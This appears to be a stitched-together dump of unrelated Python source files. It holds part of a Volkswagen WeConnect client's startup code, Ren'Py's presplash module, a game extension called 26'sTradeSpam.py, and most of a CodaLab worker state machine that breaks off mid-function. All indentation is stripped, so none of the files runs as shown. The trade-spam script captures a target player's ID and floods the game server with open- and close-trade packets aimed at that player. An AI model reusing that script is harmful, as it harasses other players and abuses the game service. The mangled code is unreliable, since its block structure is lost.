homekitGroup = parser.add_argument_group('Homekit')
homekitGroup.add_argument('--with-homekit', dest='withHomekit', help='Provide Apple Homekit functionality', action='store_true')
args = parser.parse_args()
logLevel = LOG_LEVELS.index(DEFAULT_LOG_LEVEL)
for adjustment in args.verbose or ():
logLevel = min(len(LOG_LEVELS) - 1, max(logLevel + adjustment, 0))
logging.basicConfig(level=LOG_LEVELS[logLevel])
logging.getLogger("pyhap").setLevel(level="CRITICAL")
# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
LOG.info('vwsfriend %s (using WeConnect-python %s)', __version__, __weconnect_version__)
username = None
password = None
if args.username is not None and args.password is not None:
username = args.username
password = args.password
else:
if args.netrc is not None:
netRcFilename = args.netrc
else:
netRcFilename = defaultNetRc
try:
secrets = netrc.netrc(file=args.netrc)
username, _, password = secrets.authenticators("volkswagen.de")
except TypeError:
if not args.username:
LOG.error('volkswagen.de entry was not found in %s netrc-file. Create it or provide at least a username'
' with --username', netRcFilename)
sys.exit(1)
username = args.username
password = getpass.getpass()
except FileNotFoundError:
if not args.username:
LOG.error('%s netrc-file was not found. Create it or provide at least a username with --username',
netRcFilename)
sys.exit(1)
username = args.username
password = getpass.getpass()
tokenfile = None
if not args.noTokenStorage:
tokenfile = args.tokenfile
try:
weConnect = weconnect.WeConnect(username=username, password=password, tokenfile=tokenfile,
updateAfterLogin=False, loginOnInit=(args.demo is None))
connector = AgentConnector(weConnect=weConnect, dbUrl=args.dbUrl, interval=args.interval, withDB=args.withDatabase, withABRP=args.withABRP,
configDir=args.configDir)
driver = None
if args.withHomekit:
LOG.info('Starting up Homekit')
# Start the accessory on port 51826
driver = AccessoryDriver(pincode=None, persist_file=f'{args.configDir}/accessory.state')
for characteristicKey, characteristic in CUSTOM_CHARACTERISTICS.items():
driver.loader.char_types[characteristicKey] = characteristic
bridge = VWsFriendBridge(driver=driver, weConnect=weConnect, accessoryConfigFile=f'{args.configDir}/accessory.config')
driver.add_accessory(bridge)
weConnectBridgeInitialized = False
# Start it!
hapThread = threading.Thread(target=driver.start)
hapThread.start()
ui = VWsFriendUI(weConnect=weConnect, connector=connector, homekitDriver=driver, dbUrl=args.dbUrl)
ui.run()
if args.demo is not None:
utcDemoStart = datetime.utcnow().replace(tzinfo=timezone.utc, microsecond=0)
for file in sorted(os.listdir(args.demo)):
fileNameRegex = r'(?P<number>\d+)_(?P<delay>\d+)s(_(?P<stage>[^\.]+))?.cache.json'
match = re.search(fileNameRegex, file)
if match is not None:
time.sleep(int(match.groupdict()['delay']))
stageFilePath = f'{args.demo}/{file}'
with open(stageFilePath, mode='r', encoding='utf8') as fp:
cacheString = fp.read()
cacheString = re.sub(r'demodate\((?P<offset>[+-]?\d+)\)',
lambda m: str(utcDemoStart + timedelta(seconds=int(m.groupdict()['offset']))).replace('+00:00', 'Z'), cacheString)
cacheString = re.sub(r'now\((?P<offset>[+-]?\d+)\)',
lambda m: str(datetime.now() + timedelta(seconds=int(m.groupdict()['offset']))), cacheString)
weConnect.fillCacheFromJsonString(cacheString, maxAge=2147483647)
if args.withHomekit and not weConnectBridgeInitialized:
weConnectBridgeInitialized = True
bridge.update()
weConnect.update(updateCapabilities=True)
connector.commit()
if match.groupdict()['stage'] is not None:
LOG.info('Stage %s completed', match.groupdict()['stage'])
else:
LOG.info('Stage completed')
LOG.info('Demo completed')
else:
while True:
try:
LOG.info('Updating data from WeConnect')
weConnect.update(updateCapabilities=True, updatePictures=True, force=True)
connector.commit()
if args.withHomekit and not weConnectBridgeInitialized:
weConnectBridgeInitialized = True
bridge.update()
except weconnect.RetrievalError:
LOG.error('Retrieval error during update. Will try again after configured interval of %ds', args.interval)
time.sleep(args.interval)
except weconnect.AuthentificationError as e:
LOG.critical('There was a problem when authenticating with WeConnect: %s', e)
except weconnect.APICompatibilityError as e:
LOG.critical('There was a problem when communicating with WeConnect.'
' If this problem persists please open a bug report: %s', e)
|
presplash.py
|
# Copyright 2004-2018 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Pre-splash code. The goal of this code is to try to get a pre-splash
# screen up as soon as possible, to let the user know something is
# going on.
from __future__ import print_function
import threading
import pygame_sdl2
import os.path
import sys
import time
import renpy
# The window.
window = None
# Should the event thread keep running?
keep_running = False
# The start time.
start_time = time.time()
PRESPLASHEVENT = pygame_sdl2.event.register("PRESPLASHEVENT")
def run_event_thread():
"""
Disposes of events while the window is running.
"""
pygame_sdl2.time.set_timer(PRESPLASHEVENT, 20)
while keep_running:
pygame_sdl2.event.wait()
pygame_sdl2.time.set_timer(PRESPLASHEVENT, 0)
def start(basedir, gamedir):
"""
Called to display the presplash when necessary.
"""
if "RENPY_LESS_UPDATES" in os.environ:
return
filenames = [ "/presplash.png", "/presplash.jpg" ]
for fn in filenames:
fn = gamedir + fn
if os.path.exists(fn):
break
else:
return
if renpy.windows:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
pygame_sdl2.display.init()
img = pygame_sdl2.image.load(fn, fn)
global window
bounds = pygame_sdl2.display.get_display_bounds(0)
sw, sh = img.get_size()
x = bounds[0] + bounds[2] // 2 - sw // 2
y = bounds[1] + bounds[3] // 2 - sh // 2
window = pygame_sdl2.display.Window(
sys.argv[0],
img.get_size(),
flags=pygame_sdl2.WINDOW_BORDERLESS,
pos=(x, y))
img = img.convert_alpha(window.get_surface())
window.get_surface().blit(img, (0, 0))
window.update()
global event_thread
event_thread = threading.Thread(target=run_event_thread)
event_thread.daemon = True
event_thread.start()
global start_time
start_time = time.time()
def end():
"""
Called just before we initialize the display to hide the presplash.
"""
global keep_running
global event_thread
global window
if window is None:
return
keep_running = False
event_thread.join()
window.destroy()
window = None
def sleep():
"""
Sleep to the end of config.minimum_presplash_time.
"""
if not (window or renpy.mobile):
return
remaining = start_time + renpy.config.minimum_presplash_time - time.time()
if remaining > 0:
time.sleep(remaining)
|
26'sTradeSpam.py
|
import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26'sTradeSpam",
"description": "ts: on&off&cho ",
"version": "0.2",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "OpenTrading"
KASAR = "CloseTrading"
kod = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}')
sleep(0.1)
ext.send_to_server('{out:'+str(KASAR)+'}')
sleep(0.1)
text = msj.packet.read_string()
if text == ':ts cho':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Open a trade to the player you want to trade spam with "}{i:0}{i:30}{i:0}{i:0}')
if text == ':ts on':
msj.is_blocked = True
sc = True
thread = threading.Thread(target=main)
thread.start()
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: on "}{i:0}{i:30}{i:0}{i:0}')
if text == ':ts off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
sec_kod = False
user_id, _, _ = p.packet.read("iii")
kod = str(user_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'OpenTrading')
|
worker_run_state.py
|
import docker
import glob
import logging
import os
import threading
import time
import traceback
import codalab.worker.docker_utils as docker_utils
from collections import namedtuple
from pathlib import Path
from codalab.lib.formatting import size_str, duration_str
from codalab.worker.file_util import remove_path, get_path_size, path_is_parent
from codalab.worker.bundle_state import State, DependencyKey
from codalab.worker.fsm import DependencyStage, StateTransitioner
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
class RunStage(object):
"""
Defines the finite set of possible stages and transition functions
Note that it is important that each state be able to be re-executed
without unintended adverse effects (which happens upon worker resume)
"""
WORKER_STATE_TO_SERVER_STATE = {}
"""
This stage involves setting up the directory structure for the run
and preparing to start the container
"""
PREPARING = 'RUN_STAGE.PREPARING'
WORKER_STATE_TO_SERVER_STATE[PREPARING] = State.PREPARING
"""
Running encompasses the state where the user's job is running
"""
RUNNING = 'RUN_STAGE.RUNNING'
WORKER_STATE_TO_SERVER_STATE[RUNNING] = State.RUNNING
"""
This stage encompasses cleaning up intermediary components like
the dependency symlinks and also the releasing of dependencies
"""
CLEANING_UP = 'RUN_STAGE.CLEANING_UP'
WORKER_STATE_TO_SERVER_STATE[CLEANING_UP] = State.RUNNING
"""
Uploading results means the job's results are getting uploaded to the server
"""
UPLOADING_RESULTS = 'RUN_STAGE.UPLOADING_RESULTS'
WORKER_STATE_TO_SERVER_STATE[UPLOADING_RESULTS] = State.RUNNING
"""
Finalizing means the worker is finalizing the bundle metadata with the server
"""
FINALIZING = 'RUN_STAGE.FINALIZING'
WORKER_STATE_TO_SERVER_STATE[FINALIZING] = State.FINALIZING
"""
Finished means the worker is done with this run
"""
FINISHED = 'RUN_STAGE.FINISHED'
WORKER_STATE_TO_SERVER_STATE[FINISHED] = State.READY
"""
This stage will collect bundles in terminal states and
sent them back to the server with RESTAGED state
"""
RESTAGED = 'RUN_STAGE.RESTAGED'
WORKER_STATE_TO_SERVER_STATE[RESTAGED] = State.STAGED
RunState = namedtuple(
'RunState',
[
'stage', # RunStage
'run_status', # str
'bundle', # BundleInfo
'bundle_path', # str
'bundle_dir_wait_num_tries', # Optional[int]
'resources', # RunResources
'bundle_start_time', # int
'container_time_total', # int
'container_time_user', # int
'container_time_system', # int
'container', # Optional[docker.Container]
'container_id', # Optional[str]
'docker_image', # Optional[str]
'is_killed', # bool
'has_contents', # bool
'cpuset', # Optional[Set[str]]
'gpuset', # Optional[Set[str]]
'max_memory', # int
'disk_utilization', # int
'exitcode', # Optionall[str]
'failure_message', # Optional[str]
'kill_message', # Optional[str]
'finished', # bool
'finalized', # bool
'is_restaged', # bool
'cpu_usage', # float
'memory_usage', # float
'bundle_profile_stats', # dict
'paths_to_remove', # list[str]. Stores paths to be removed after the worker run.
],
)
"""Dependency that is mounted.
TODO(Ashwin): document this better
docker_path - path on the Docker container where the dependency is mounted
example (shared file system): /0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
child_path - path inside the bundle folder from where the dependency is mounted
example (shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
parent_path - path of the dependency
example (shared file system): /opt/codalab-worksheets/tests/files/a.txt
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
"""
DependencyToMount = namedtuple('DependencyToMount', 'docker_path, child_path, parent_path')
def log_bundle_transition(
bundle_uuid: str,
previous_stage: str,
next_stage: str,
reason: str = '',
level: int = logging.INFO,
):
info = f'Bundle {bundle_uuid} is transitioning from {previous_stage} to {next_stage}'
if reason != '':
info = f'{info}. Reason: {reason}'
logger.log(level=level, msg=info)
if level >= logging.ERROR:
logger.error(traceback.format_exc())
class RunStateMachine(StateTransitioner):
"""
Manages the state machine of the runs running on the local machine
Note that in general there are two types of errors:
- User errors (fault of bundle) - we fail the bundle (move to CLEANING_UP state).
- System errors (fault of worker) - we freeze this worker (Exception is thrown up).
It's not always clear where the line is.
"""
_ROOT = '/'
_CURRENT_DIRECTORY = '.'
RESTAGED_REASON = 'The bundle is not in terminal states {READY, FAILED, KILLED} when the worker checks termination'
def __init__(
self,
image_manager, # Component to request docker images from
dependency_manager, # Component to request dependency downloads from
worker_docker_network, # Docker network to add all bundles to
docker_network_internal, # Docker network to add non-net connected bundles to
docker_network_external, # Docker network to add internet connected bundles to
docker_runtime, # Docker runtime to use for containers (nvidia or runc)
upload_bundle_callback, # Function to call to upload bundle results to the server
assign_cpu_and_gpu_sets_fn, # Function to call to assign CPU and GPU resources to each run
shared_file_system, # If True, bundle mount is shared with server
shared_memory_size_gb, # Shared memory size for the run container (in GB)
):
super(RunStateMachine, self).__init__()
self.add_transition(RunStage.PREPARING, self._transition_from_PREPARING)
self.add_transition(RunStage.RUNNING, self._transition_from_RUNNING)
self.add_transition(RunStage.CLEANING_UP, self._transition_from_CLEANING_UP)
self.add_transition(RunStage.UPLOADING_RESULTS, self._transition_from_UPLOADING_RESULTS)
self.add_transition(RunStage.FINALIZING, self._transition_from_FINALIZING)
self.add_terminal(RunStage.FINISHED)
self.add_terminal(RunStage.RESTAGED)
self.dependency_manager = dependency_manager
self.image_manager = image_manager
self.worker_docker_network = worker_docker_network
self.docker_network_external = docker_network_external
self.docker_network_internal = docker_network_internal
# todo aditya: docker_runtime will be None if the worker is a singularity worker. handle this.
self.docker_runtime = docker_runtime
# bundle.uuid -> {'thread': Thread, 'run_status': str}
self.uploading = ThreadDict(fields={'run_status': 'Upload started', 'success': False})
# bundle.uuid -> {'thread': Thread, 'disk_utilization': int, 'running': bool}
self.disk_utilization = ThreadDict(
fields={'disk_utilization': 0, 'running': True, 'lock': None}
)
self.upload_bundle_callback = upload_bundle_callback
self.assign_cpu_and_gpu_sets_fn = assign_cpu_and_gpu_sets_fn
self.shared_file_system = shared_file_system
self.shared_memory_size_gb = shared_memory_size_gb
def stop(self):
for uuid in self.disk_utilization.keys():
self.disk_utilization[uuid]['running'] = False
self.disk_utilization.stop()
self.uploading.stop()
def _transition_from_PREPARING(self, run_state):
"""
1- Request the docker image from docker image manager
- if image is failed, move to CLEANING_UP state
2- Request the dependencies from dependency manager
- if any are failed, move to CLEANING_UP state
3- If all dependencies and docker image are ready:
- Set up the local filesystem for the run
- Create symlinks to dependencies
- Allocate resources and prepare the docker container
- Start the docker container
4- If all is successful, move to RUNNING state
"""
def mount_dependency(dependency, shared_file_system):
if not shared_file_system:
# Set up symlinks for the content at dependency path
Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)
os.symlink(dependency.docker_path, dependency.child_path)
# The following will be converted into a Docker volume binding like:
# dependency_path:docker_dependency_path:ro
docker_dependencies.append((dependency.parent_path, dependency.docker_path))
if run_state.is_killed or run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'the bundle was {"killed" if run_state.is_killed else "restaged"}',
)
return run_state._replace(stage=RunStage.CLEANING_UP)
# Check CPU and GPU availability
try:
cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(
run_state.resources.cpus, run_state.resources.gpus
)
except Exception as e:
message = "Unexpectedly unable to assign enough resources to bundle {}: {}".format(
run_state.bundle.uuid, str(e)
)
logger.error(message)
logger.error(traceback.format_exc())
return run_state._replace(run_status=message)
dependencies_ready = True
status_messages = []
if not self.shared_file_system:
# No need to download dependencies if we're in the shared FS,
# since they're already in our FS
for dep in run_state.bundle.dependencies:
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)
if dependency_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Downloading dependency %s: %s done (archived size)'
% (dep.child_path, size_str(dependency_state.size_bytes))
)
dependencies_ready = False
elif dependency_state.stage == DependencyStage.FAILED:
# Failed to download dependency; -> CLEANING_UP
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'Dependency has failed for this bundle. Dependency child uuid: {dep.child_uuid}. Dependency child path: {dep.child_path}',
)
return run_state._replace(
stage=RunStage.CLEANING_UP,
failure_message='Failed to download dependency %s: %s'
% (dep.child_path, dependency_state.message),
)
# get the docker image
docker_image = run_state.resources.docker_image
image_state = self.image_manager.get(docker_image)
if image_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Pulling docker image %s %s' % (docker_image, image_state.message)
)
dependencies_ready = False
elif image_state.stage == DependencyStage.FAILED:
# Failed to pull image; -> CLEANING_UP
message = 'Failed to download Docker image: %s' % image_state.message
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
# stop proceeding if dependency and image downloads aren't all done
if not dependencies_ready:
status_message = status_messages.pop()
if status_messages:
status_message += "(and downloading %d other dependencies and docker images)" % len(
status_messages
)
logger.info(
f'bundle is not ready yet. uuid: {run_state.bundle.uuid}. status message: {status_message}'
)
return run_state._replace(run_status=status_message)
# All dependencies ready! Set up directories, symlinks and container. Start container.
# 1) Set up a directory to store the bundle.
if self.shared_file_system:
if not os.path.exists(run_state.bundle_path):
if run_state.bundle_dir_wait_num_tries == 0:
message = (
"Bundle directory cannot be found on the shared filesystem. "
"Please ensure the shared fileystem between the server and "
"your worker is mounted properly or contact your administrators."
)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason="Bundle directory cannot be found on the shared filesystem.",
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
next_bundle_dir_wait_num_tries = run_state.bundle_dir_wait_num_tries - 1
logger.info(
f'Waiting for bundle directory to be created by the server, uuid: {run_state.bundle.uuid}, bundle_dir_wait_num_tries: {next_bundle_dir_wait_num_tries}'
)
return run_state._replace(
run_status="Waiting for bundle directory to be created by the server",
bundle_dir_wait_num_tries=next_bundle_dir_wait_num_tries,
)
else:
remove_path(run_state.bundle_path)
os.makedirs(run_state.bundle_path)
# 2) Set up symlinks
docker_dependencies = []
docker_dependencies_path = (
RunStateMachine._ROOT
+ run_state.bundle.uuid
+ ('_dependencies' if not self.shared_file_system else '')
)
for dep in run_state.bundle.dependencies:
full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))
to_mount = []
dependency_path = self._get_dependency_path(run_state, dep)
if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:
# Mount all the content of the dependency_path to the top-level of the bundle
for child in os.listdir(dependency_path):
child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, child),
child_path=child_path,
parent_path=os.path.join(dependency_path, child),
)
)
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [child_path]
)
else:
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, dep.child_path),
child_path=full_child_path,
parent_path=dependency_path,
)
)
first_element_of_path = Path(dep.child_path).parts[0]
if first_element_of_path == RunStateMachine._ROOT:
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [full_child_path]
)
else:
# child_path can be a nested path, so later remove everything from the first element of the path
path_to_remove = os.path.join(run_state.bundle_path, first_element_of_path)
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [path_to_remove]
)
for dependency in to_mount:
try:
mount_dependency(dependency, self.shared_file_system)
except OSError as e:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=str(e.__class__),
level=logging.ERROR,
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))
if run_state.resources.network:
docker_network = self.docker_network_external.name
else:
docker_network = self.docker_network_internal.name
# 3) Start container
try:
container = docker_utils.start_bundle_container(
run_state.bundle_path,
run_state.bundle.uuid,
docker_dependencies,
run_state.bundle.command,
run_state.resources.docker_image,
network=docker_network,
cpuset=cpuset,
gpuset=gpuset,
memory_bytes=run_state.resources.memory,
runtime=self.docker_runtime,
shared_memory_size_gb=self.shared_memory_size_gb,
)
self.worker_docker_network.connect(container)
except docker_utils.DockerUserErrorException as e:
message = 'Cannot start Docker container: {}'.format(e)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason='Cannot start Docker container.',
level=logging.ERROR,
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
except Exception as e:
message = 'Cannot start container: {}'.format(e)
logger.error(message)
logger.error(traceback.format_exc())
raise
return run_state._replace(
stage=RunStage.RUNNING,
run_status='Running job in container',
container_id=container.id,
container=container,
docker_image=image_state.digest,
has_contents=True,
cpuset=cpuset,
gpuset=gpuset,
)
def _get_dependency_path(self, run_state, dependency):
if self.shared_file_system:
# TODO(Ashwin): make this not fs-specific.
# On a shared FS, we know where the dependency is stored and can get the contents directly
return os.path.realpath(os.path.join(dependency.location, dependency.parent_path))
else:
# On a dependency_manager setup, ask the manager where the dependency is
dep_key = DependencyKey(dependency.parent_uuid, dependency.parent_path)
return os.path.join(
self.dependency_manager.dependencies_dir,
self.dependency_manager.get(run_state.bundle.uuid, dep_key).path,
)
def _transition_from_RUNNING(self, run_state):
"""
1- Check run status of the docker container
2- If run is killed, kill the container
3- If run is finished, move to CLEANING_UP state
"""
def check_and_report_finished(run_state):
try:
finished, exitcode, failure_msg = docker_utils.check_finished(run_state.container)
except docker_utils.DockerException:
logger.error(traceback.format_exc())
finished, exitcode, failure_msg = False, None, None
return run_state._replace(
finished=finished, exitcode=exitcode, failure_message=failure_msg
)
def check_resource_utilization(run_state: RunState):
logger.info(f'Checking resource utilization for bundle. uuid: {run_state.bundle.uuid}')
cpu_usage, memory_usage = docker_utils.get_container_stats_with_docker_stats(
run_state.container
)
run_state = run_state._replace(cpu_usage=cpu_usage, memory_usage=memory_usage)
run_state = run_state._replace(memory_usage=memory_usage)
kill_messages = []
run_stats = docker_utils.get_container_stats(run_state.container)
run_state = run_state._replace(
max_memory=max(run_state.max_memory, run_stats.get('memory', 0))
)
run_state = run_state._replace(
disk_utilization=self.disk_utilization[run_state.bundle.uuid]['disk_utilization']
)
container_time_total = docker_utils.get_container_running_time(run_state.container)
run_state = run_state._replace(
container_time_total=container_time_total,
container_time_user=run_stats.get(
'container_time_user', run_state.container_time_user
),
container_time_system=run_stats.get(
'container_time_system', run_state.container_time_system
),
)
if run_state.resources.time and container_time_total > run_state.resources.time:
kill_messages.append(
'Time limit exceeded. (Container uptime %s > time limit %s)'
% (duration_str(container_time_total), duration_str(run_state.resources.time))
)
if run_state.max_memory > run_state.resources.memory or run_state.exitcode == 137:
kill_messages.append(
'Memory limit %s exceeded.' % size_str(run_state.resources.memory)
)
if run_state.resources.disk and run_state.disk_utilization > run_state.resources.disk:
kill_messages.append(
'Disk limit %sb exceeded.' % size_str(run_state.resources.disk)
)
if kill_messages:
run_state = run_state._replace(kill_message=' '.join(kill_messages), is_killed=True)
return run_state
def check_disk_utilization():
logger.info(f'Checking disk utilization for bundle. uuid: {run_state.bundle.uuid}')
running = True
while running:
start_time = time.time()
try:
disk_utilization = get_path_size(run_state.bundle_path)
self.disk_utilization[run_state.bundle.uuid][
'disk_utilization'
] = disk_utilization
running = self.disk_utilization[run_state.bundle.uuid]['running']
except Exception:
logger.error(traceback.format_exc())
end_time = time.time()
# To ensure that we don't hammer the disk for this computation when
# there are lots of files, we run it at most 10% of the time.
time.sleep(max((end_time - start_time) * 10, 1.0))
self.disk_utilization.add_if_new(
run_state.bundle.uuid, threading.Thread(target=check_disk_utilization, args=[])
)
run_state = check_and_report_finished(run_state)
run_state = check_resource_utilization(run_state)
if run_state.is_killed or run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'the bundle was {"killed" if run_state.is_killed else "restaged"}',
)
if docker_utils.container_exists(run_state.container):
try:
run_state.container.kill()
except docker.errors.APIError:
finished, _, _ = docker_utils.check_finished(run_state.container)
if not finished:
logger.error(traceback.format_exc())
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP)
if run_state.finished:
logger.debug(
'Finished run with UUID %s, exitcode %s, failure_message %s',
run_state.bundle.uuid,
run_state.exitcode,
run_state.failure_message,
)
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP, run_status='Uploading results')
else:
return run_state
def _transition_from_CLEANING_UP(self, run_state):
"""
1- delete the container if still existent
2- clean up the dependencies from bundle directory
3- release the dependencies in dependency manager
4- If bundle has contents to upload (i.e. was RUNNING at some point),
move to UPLOADING_RESULTS state
Otherwise move to FINALIZING state
"""
def remove_path_no_fail(path):
try:
remove_path(path)
except Exception:
logger.error(traceback.format_exc())
if run_state.container_id is not None:
while docker_utils.container_exists(run_state.container):
try:
finished, _, _ = docker_utils.check_finished(run_state.container)
if finished:
run_state.container.remove(force=True)
run_state = run_state._replace(container=None, container_id=None)
break
else:
try:
run_state.container.kill()
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
for dep in run_state.bundle.dependencies:
if not self.shared_file_system: # No dependencies if shared fs worker
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
self.dependency_manager.release(run_state.bundle.uuid, dep_key)
# Clean up dependencies paths
for path in run_state.paths_to_remove or []:
remove_path_no_fail(path)
run_state = run_state._replace(paths_to_remove=[])
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
reason=self.RESTAGED_REASON,
)
return run_state._replace(stage=RunStage.RESTAGED)
if not self.shared_file_system and run_state.has_contents:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.UPLOADING_RESULTS,
)
return run_state._replace(
stage=RunStage.UPLOADING_RESULTS, run_status='Uploading results', container=None
)
else:
# No need to upload results since results are directly written to bundle store
# Delete any files that match the exclude_patterns .
for exclude_pattern in run_state.bundle.metadata["exclude_patterns"]:
full_pattern = os.path.join(run_state.bundle_path, exclude_pattern)
for file_path in glob.glob(full_pattern, recursive=True):
# Only remove files that are subpaths of run_state.bundle_path, in case
# that exclude_pattern is something like "../../../".
if path_is_parent(parent_path=run_state.bundle_path, child_path=file_path):
remove_path(file_path)
return self.finalize_run(run_state)
def _transition_from_UPLOADING_RESULTS(self, run_state):
"""
If bundle not already uploading:
Use the RunManager API to upload contents at bundle_path to the server
Pass the callback to that API such that if the bundle is killed during the upload,
the callback returns false, allowing killable uploads.
If uploading and not finished:
Update run_status with upload progress
If uploading and finished:
Move to FINALIZING state
"""
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
reason=self.RESTAGED_REASON,
)
return run_state._replace(stage=RunStage.RESTAGED)
def upload_results():
try:
# Upload results
logger.debug('Uploading results for run with UUID %s', run_state.bundle.uuid)
def progress_callback(bytes_uploaded):
run_status = 'Uploading results: %s done (archived size)' % size_str(
bytes_uploaded
)
self.uploading[run_state.bundle.uuid]['run_status'] = run_status
return True
self.upload_bundle_callback(
run_state.bundle.uuid,
run_state.bundle_path,
run_state.bundle.metadata["exclude_patterns"],
run_state.bundle.metadata["store"],
progress_callback,
)
self.uploading[run_state.bundle.uuid]['success'] = True
except Exception as e:
self.uploading[run_state.bundle.uuid]['run_status'] = (
"Error while uploading: %s" % e
)
logger.error(traceback.format_exc())
self.uploading.add_if_new(
run_state.bundle.uuid, threading.Thread(target=upload_results, args=[])
)
if self.uploading[run_state.bundle.uuid].is_alive():
return run_state._replace(
run_status=self.uploading[run_state.bundle.uuid]['run_status']
)
elif not self.uploading[run_state.bundle.uuid]['success']:
# upload failed
failure_message = run_state.failure_message
if failure_message:
failure_message = (
f'{failure_message}. {self.uploading[run_state.bundle.uuid]["run_status"]}'
)
else:
failure_message = self.uploading[run_state.bundle.uuid]['run_status']
logger.info(
f'Upload failed. uuid: {run_state.bundle.uuid}. failure message: {failure_message}'
)
run_state = run_state._replace(failure_message=failure_message)
self.uploading.remove(run_state.bundle.uuid)
return self.finalize_run(run_state)
def finalize_run(self, run_state):
"""
Prepare the finalize message to be sent with the next checkin
"""
if run_state.is_killed:
# Append kill_message, which contains more useful info on why a run was killed, to the failure message.
failure_message = (
"{}. {}".format(run_state.failure_message, run_state.kill_message)
if run_state.failure_message
else run_state.kill_message
)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.FINALIZING,
reason=f'Bundle is killed. uuid: {run_state.bundle.uuid}. failure message: {failure_message}',
)
run_state = run_state._replace(failure_message=failure_message)
else:
